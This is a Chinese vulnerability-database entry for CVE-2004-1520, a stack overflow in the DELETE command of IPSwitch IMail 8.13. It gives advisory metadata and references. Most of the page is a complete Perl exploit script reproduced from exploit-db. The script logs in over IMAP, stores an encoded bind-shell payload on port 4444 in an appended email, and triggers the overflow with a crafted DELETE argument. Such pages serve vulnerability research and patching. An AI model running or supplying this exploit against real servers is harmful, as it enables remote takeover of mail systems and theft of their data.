IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞

IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞

漏洞ID 1108274 漏洞类型 边界条件错误
发布时间 2004-11-12 更新时间 2005-10-20
图片[1]-IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞-安全小百科CVE编号 CVE-2004-1520
图片[2]-IPSwitch IMail 8.13远程DELETE命令缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200412-722
漏洞平台 Windows CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/627
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-722
|漏洞详情
IpswitchIMailServer是一款强大的邮件解决方案。IpswitchIMailServer在处理DELETE命令时处理不正确,远程攻击者可以利用这个漏洞对系统进行缓冲区溢出攻击。IpswitchIMail在处理DELETE命令时缺少正确的边界缓冲区检查,验证用户提交超长参数的DELETE命令可以进程权限在系统上执行任意指令。
|漏洞EXP
#!/usr/bin/perl -w
###################################
#
# IPSwitch-IMail-8.13-DELETE
#
# Discovered by : Muts
# Coded by : Zatlander
# WWW.WHITEHAT.CO.IL
#
##################################
#
# Plain vanilla stack overflow in the DELETE command
# Restrictions:
#   - Need valid authentication credentials
#   - Input buffer only allows characters between x20 -> x7e
#
# Credits:
#   - http://www.metasploit.org  - HD Moore for the metasploit shellcode
#   - http://www.edup.tudelft.nl/~bjwever/menu.html - skylined for the ALPHA ascii shellcode generator
#   - http://www.hick.org - for the syscall egghunt code in the paper "Understanding Windows Shellcode"
#
##################################

use IO::Socket;
use Getopt::Std;
use Mail::IMAPClient;

print "Exploit for the IPSwitch IMail DELETE buffer overflown";
print "C0d3d by Zatlandern";
print "Discovered by Mutsn";
print "WWW.WHITEHAT.CO.ILn";
print "For hacking purposes only!!!nn";

# Find shellcode with signature "w00tw00t"; start from esp
# from 0 -> $egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PLMvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA";
$egghunter = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PLMtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA";

# Real shellcode: bind shell on port 4444 ( ./alpha edx < shellcode.bin )
$shellcode = "JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGnkbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvahGZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oRuFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGyjDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJKOKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA";

getopts("h:u:p:", %args);

if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) {
   print "Usage: $0 -h [host] -u [username] -p [password]n";
   exit;}

$usr  = $args{u};
$pwd  = $args{p};
$host = $args{h};

# jb +20; jnb +20  -> jump over return address (0x21 is first ascii safe offset)
$jmp21 = "r!s!";

# 0x6921526A -> pointer to "CALL [EDX+8]" ends up in return address
##########################################################################
# This should hopefully be the only version dependent variable here.
# Find an ASCII safe address pointing to a CALL [EDX+8] for your OS
##########################################################################
$calledx8 = "jR!i";

# aAA aligns ESP with the egghunter shellcode (popad, pop, pop)
$asciieh = "aAA" . $egghunter;
$asciisc = "w00tw00t" . $shellcode;
$email =
   "From: "The guy hacking you" <[email protected]>rn" .
   "To: "Poor You" <[email protected]>rn" .
   "Subject: $asciiscrn" .
   "Date: Wed, 3 Nov 2004 14:45:11 +0100rn" .
   "Message-ID: <000101c4c1acdcndj6d69b90$5e01a8c0@snorlax>rn" .
   "Content-Type: text/plain;rntcharset="us-ascii"rn" .
   "Content-Transfer-Encoding: 7bitrn" .
   "rn" .
   $asciisc;

$payload = "A" x 236 . $jmp21 x 3 . $calledx8 . "S" x 29 . $asciieh . "rn";

print "Login in to $host as $usr/$pwdn";
my $imap = Mail::IMAPClient->new( Server => $host, User => $usr, Password=> $pwd) or die "Cannot connect: $@";
print "count: " . $imap->message_count("Inbox") . "n";
print "Sending EGGn";
$imap->select("Inbox") or die "Could not select: $@n";
my $uid = $imap->append( "Inbox", $email ) or die "Cannot append: $@";
$msg =  $imap->message_string($uid) or die "Cannot get message: $@";
#$msg =  $imap->body_string($uid) or die "Cannot get message: $@"; 
#print "retrieving $uid back: $msgn";

print "Overflowing DELETEn";
$imap->delete($payload) or die "Cannot delete: $@n";

print("Finished...n");

# milw0rm.com [2004-11-12]
|参考资料

来源:BID
名称:11675
链接:http://www.securityfocus.com/bid/11675
来源:SECUNIA
名称:13200
链接:http://secunia.com/advisories/13200
来源:XF
名称:ipswitch-delete-bo(18058)
链接:http://xforce.iss.net/xforce/xfdb/18058
来源:BUGTRAQ
名称:20041112IPSwitch-IMail-8.13StackOverflowintheDELETECommand
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110037283803560&w;=2
来源:NSFOCUS
名称:7108
链接:http://www.nsfocus.net/vulndb/7108

相关推荐: Cisco外出访问控制列表绕过漏洞

Cisco外出访问控制列表绕过漏洞 漏洞ID 1205053 漏洞类型 设计错误 发布时间 2001-12-06 更新时间 2005-05-02 CVE编号 CVE-2001-0866 CNNVD-ID CNNVD-200112-030 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享